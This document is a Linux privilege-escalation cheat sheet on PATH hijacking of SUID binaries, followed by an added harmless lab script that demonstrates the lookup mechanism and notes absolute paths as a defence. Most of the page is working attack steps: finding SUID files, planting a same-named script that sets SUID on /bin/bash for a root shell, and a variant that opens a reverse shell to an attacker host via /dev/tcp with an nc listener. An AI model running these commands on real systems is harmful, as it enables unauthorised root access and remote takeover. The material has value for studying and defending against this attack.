
Path Hijacking

Some examples of abusing a SUID binary that runs another program by its bare name (without an absolute path): put a file with that name in a directory you control and place that directory first in $PATH, so the SUID binary runs your file instead.
Find SUID files:
find / -perm -4000 2>/dev/null
Work out which command the SUID binary calls without an absolute path (strings or ltrace on the binary will show it); the file you create must carry exactly that name, which is what <same_file_name_with_suid> stands for below. Create it and make it executable:
touch <same_file_name_with_suid>
chmod +x <same_file_name_with_suid>

chmod 4755

To give SUID privileges to any binary, in this case /bin/bash, the file only has to run chmod 4755 /bin/bash. Three ways to write it (echo, nano, vim):
echo "#!/bin/bash" > <same_file_name_with_suid>
echo "chmod 4755 /bin/bash" >> <same_file_name_with_suid>
nano <same_file_name_with_suid>
#!/bin/bash
chmod 4755 /bin/bash
vim <same_file_name_with_suid>
#!/bin/bash
chmod 4755 /bin/bash
Prepend the directory that holds the file (not the file itself) to the current PATH:
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
export PATH=/home/example:$PATH # the directory containing <same_file_name_with_suid>; $PATH keeps the current value
echo $PATH
/home/example:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
Execute the SUID file again: it now resolves <same_file_name_with_suid> to your copy and runs chmod 4755 /bin/bash with its elevated privileges.
Now just type in the terminal
bash -p # -p keeps the effective (root) UID instead of dropping it to the real UID

Reverse Shell

On the attack machine, listen on a port:
nc -lnvp 443
Now create the file with a connection back to the attacker's host on port 443. The -p is needed because bash drops an effective UID that differs from the real UID on startup; if the SUID program calls setuid(0) before running the command, a plain bash -i also works:
echo "#!/bin/bash" > <same_file_name_with_suid>
echo "/bin/bash -c 'bash -p -i >& /dev/tcp/<attackerlhost>/443 0>&1'" >> <same_file_name_with_suid>
chmod +x <same_file_name_with_suid>
Prepend the directory that holds the file (not the file itself) to the current PATH:
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
export PATH=/home/example:$PATH # the directory containing <same_file_name_with_suid>; $PATH keeps the current value
echo $PATH
/home/example:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
Execute the SUID file again; the shell connects back to the listener with the privileges of the SUID binary.
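The mechanism both variants above depend on (a SUID program resolving a command through $PATH) can be tried without root. The following is an added example, not code from the original page: a constructed lab in which a stand-in for the SUID binary calls whoami by bare name, a hijack file is written the way the echo variant does, a quick check lists bare-name commands in the victim, and the victim is run before and after prepending the attacker's directory to $PATH. The SUID bit, the chmod 4755 /bin/bash payload and the reverse-shell payload are left out (they need root or a listener); substituting either as the payload body reproduces the page's two variants. The names suid_prog, write_hijack, the attacker/victim directory layout and the temp-directory location are assumptions of this example.

```shell
#!/bin/bash
# Added example, not from the original page: a no-root lab showing the
# PATH-resolution mechanism the page relies on. A stand-in for the SUID
# binary calls "whoami" by bare name; the attacker drops a file named
# whoami in a writable directory and prepends that directory to $PATH.
# No SUID bit is set (that needs root), so the payload is a harmless echo;
# in the real case the payload body would be "chmod 4755 /bin/bash" or the
# reverse-shell line. All paths and names are constructed for this demo.
set -u

# Create the lab under a temp directory and print its path.
setup_lab() {
    local lab
    lab=$(mktemp -d "${TMPDIR:-/tmp}/pathhijack.XXXXXX")
    mkdir -p "$lab/victim" "$lab/attacker"
    # Stand-in for the SUID binary: a bare-name call, so $PATH decides
    # which "whoami" actually runs.
    printf '#!/bin/sh\nwhoami\n' > "$lab/victim/suid_prog"
    chmod +x "$lab/victim/suid_prog"
    printf '%s\n' "$lab"
}

# Write the hijack file: $1 lab dir, $2 command name to shadow, $3 payload body.
# Shebang plus executable bit, exactly as the page's echo variant does.
write_hijack() {
    local target="$1/attacker/$2"
    printf '#!/bin/bash\n%s\n' "$3" > "$target"
    chmod +x "$target"
}

# Heuristic check for bare-name calls in a binary or script: printable
# strings that begin a line without a leading slash (same idea as running
# strings on the SUID binary; confirm real hits with ltrace).
list_bare_commands() {
    tr -c '[:print:]\n' '\n' < "$1" | grep -Eo '^[a-z][a-z0-9_-]+' | sort -u
}

# Run the victim with the unmodified PATH: the real whoami answers.
run_clean() {
    "$1/victim/suid_prog"
}

# Run the victim with the attacker directory first in PATH: the fake
# whoami is found first and its payload runs in the victim's context.
run_hijacked() {
    PATH="$1/attacker:$PATH" "$1/victim/suid_prog"
}

LAB=$(setup_lab)
write_hijack "$LAB" whoami 'echo HIJACKED'
echo "bare-name commands in victim: $(list_bare_commands "$LAB/victim/suid_prog")"
echo "clean run:    $(run_clean "$LAB")"
echo "hijacked run: $(run_hijacked "$LAB")"
rm -rf "$LAB"
```

The hijacked run prints HIJACKED while the clean run prints the current user name, which is the whole trick: nothing in the victim changed, only the lookup order. The same lab also shows the defence: rewrite the victim to call /usr/bin/whoami by absolute path (or have it reset PATH to a fixed value) and the hijacked run behaves like the clean one.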